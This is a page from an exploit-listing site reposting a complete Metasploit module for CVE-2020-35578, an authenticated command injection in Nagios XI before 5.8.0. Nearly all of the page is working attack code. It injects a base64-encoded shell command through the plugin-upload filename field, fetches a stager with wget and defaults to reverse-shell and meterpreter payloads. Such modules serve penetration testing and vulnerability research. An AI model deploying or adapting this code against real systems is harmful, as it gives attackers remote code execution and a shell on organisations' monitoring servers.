Advertisement






Nagios XI Remote Code Execution

CVE Category Price Severity
CVE-2020-35578 CWE-77 $25,000 Critical
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-04-15
CPE
cpe:cpe:/a:nagios:nagios_xi
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040086

Below is a copy:

Nagios XI Remote Code Execution
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::NagiosXi
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection',
        'Description' => %q{
          This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php`
          page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows
          an authenticated admin user to achieve remote code execution as the `apache` user by uploading
          a malicious plugin.

          Valid credentials for a Nagios XI admin user are required. This module has
          been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both
          running on CentOS 7.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Haboob Team', # https://haboob.sa - PoC
            'Erik Wynter' # @wyntererik - Metasploit'
          ],
        'References' =>
          [
            ['CVE', '2020-35578'],
            ['EDB', '49422']
          ],
        'Platform' => %w[linux unix],
        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD],
        'Targets' =>
          [
            [
              'Linux (x86/x64)', {
                'Arch' => [ARCH_X86, ARCH_X64],
                'Platform' => 'linux',
                # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation
                'CmdStagerFlavor' => :wget,
                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
              }
            ],
            [
              'CMD', {
                'Arch' => [ARCH_CMD],
                'Platform' => 'unix',
                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
              }
            ]
          ],
        'Privileged' => false,
        'DisclosureDate' => '2020-12-19',
        'DefaultTarget' => 0,
        'Notes' =>
          {
            'Stability' => [ CRASH_SAFE ],
            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
            'Reliability' => [FIRST_ATTEMPT_FAIL] # payload may not connect back the first time
          }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil])
    ]
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def finish_install
    datastore['FINISH_INSTALL']
  end

  def check
    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
    # an array containing the http response body of a get request to index.php and the session cookies
    login_result, res_array = nagios_xi_login(username, password, finish_install)
    case login_result
    when 1..3 # An error occurred
      return CheckCode::Unknown(res_array[0])
    when 4 # Nagios XI is not fully installed
      install_result = install_nagios_xi(password)
      if install_result
        return CheckCode::Unknown(install_result[1])
      end

      login_result, res_array = login_after_install_or_license(username, password, finish_install)
      case login_result
      when 1..3 # An error occurred
        return CheckCode::Unknown(res_array[0])
      when 4 # Nagios XI is still not fully installed
        return CheckCode::Detected('Failed to install Nagios XI on the target.')
      end
    end

    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
    if login_result == 5 # the Nagios XI license agreement has not been signed
      auth_cookies, nsp = res_array
      sign_license_result = sign_license_agreement(auth_cookies, nsp)
      if sign_license_result
        return CheckCode::Unknown(sign_license_result[1])
      end

      login_result, res_array = login_after_install_or_license(username, password, finish_install)
      case login_result
      when 1..3
        return CheckCode::Unknown(res_array[0])
      when 5 # the Nagios XI license agreement still has not been signed
        return CheckCode::Detected('Failed to sign the license agreement.')
      end
    end

    print_good('Successfully authenticated to Nagios XI')

    # Obtain the Nagios XI version
    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already

    nagios_version = nagios_xi_version(res_array[0])
    if nagios_version.nil?
      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
    end

    print_status("Target is Nagios XI with version #{nagios_version}")
    # check if the target is actually vulnerable
    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
    end
    @version = Rex::Version.new(nagios_version)
    if @version < Rex::Version.new('5.8.0')
      return CheckCode::Appears
    end

    return CheckCode::Safe
  end

  def execute_command(cmd, _opts = {})
    # Convert the payload to hex ASCII and then Base64 encode the payload.
    # This is necessary for the exploit to work.
    payload_ascii = Rex::Text.to_hex_ascii(cmd)
    payload_base64 = Rex::Text.encode_base64(payload_ascii)
    payload = ";echo #{payload_base64} | base64 -d | bash;#"
    register_file_for_cleanup("/usr/local/nagios/libexec/#{payload}") # deleting the payload via the web interface doesn't seem possible

    # generate post data
    post_data = Rex::MIME::Message.new
    random_post_content = rand_text_alphanumeric(8..12)
    post_data.add_part('', nil, nil, 'form-data; name="upload"')
    post_data.add_part(@nsp, nil, nil, 'form-data; name="nsp"')
    post_data.add_part(random_post_content, 'text/plain', nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload}\"")
    post_data.add_part('1', nil, nil, 'form-data; name="convert_to_unix"')

    # upload payload
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => @auth_cookies,
      'data' => post_data.to_s
    }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
  end

  def exploit
    if @version < Rex::Version.new('5.3.0')
      fail_with(Failure::NoTarget, 'Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!')
    end

    # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
      'cookie' => @auth_cookies
    })

    unless res
      fail_with(Failure::Disconnected, "Connection failed while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
    end

    unless res.code == 200 && res.body.include?('<title>Manage Plugins &middot; Nagios XI</title>')
      fail_with(Failure::UnexpectedReply, "Unexpected response received while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
    end

    # grab the nsp token, using the Nagios XI mixin
    @nsp = get_nsp(res)

    if @nsp.blank?
      fail_with(Failure::Unknown, 'Failed to obtain the nsp token required to upload the payload')
    end

    if target.arch.first == ARCH_CMD
      print_status('Executing the payload')
      execute_command(payload.encoded)
    else
      execute_cmdstager(background: true)
    end
  end
end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum